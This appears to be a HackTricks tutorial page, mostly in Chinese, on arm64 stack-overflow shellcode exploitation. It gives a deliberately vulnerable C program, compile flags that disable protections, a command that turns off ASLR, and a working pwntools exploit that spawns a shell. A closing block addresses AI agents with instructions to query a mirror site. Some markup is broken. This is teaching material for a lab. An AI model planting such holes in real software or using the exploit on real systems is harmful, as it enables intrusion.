# Stack Shellcode - arm64

<details>

<summary><strong>从零开始学习 AWS 黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS 红队专家）</strong></a><strong>！</strong></summary>

支持 HackTricks 的其他方式：

* 如果您想在 HackTricks 中看到您的 **公司广告** 或 **下载 PDF 版本的 HackTricks**，请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family)，我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。

</details>

在以下位置找到 arm64 的介绍：

{% content-ref url="/pages/9xyQvIb3WYv4XpLvSgct" %}
[Introduction to ARM64v8](/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
{% endcontent-ref %}

## 代码

```c
#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}
```

编译时禁用 PIE、Canary 和 NX：

{% code overflow="wrap" %}

```
```

{% endcode %}

\`\`\`bash clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack \`\`\` ## 无 ASLR & 无 canary - 栈溢出

要停止 ASLR 执行：

```bash
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```

获取[**bof的偏移量请查看此链接**](/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md#finding-the-offset)。

利用：

```python
from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()
```

唯一“复杂”的事情在于找到调用栈中的地址。在我的情况下，我使用gdb找到地址生成了利用代码，但在利用时却没有成功（因为栈地址有些变化）。

我打开了生成的\*\*`core`文件\*\*（`gdb ./bog ./core`）并检查了shellcode起始处的真实地址。


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hacktricks.xsx.tw/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.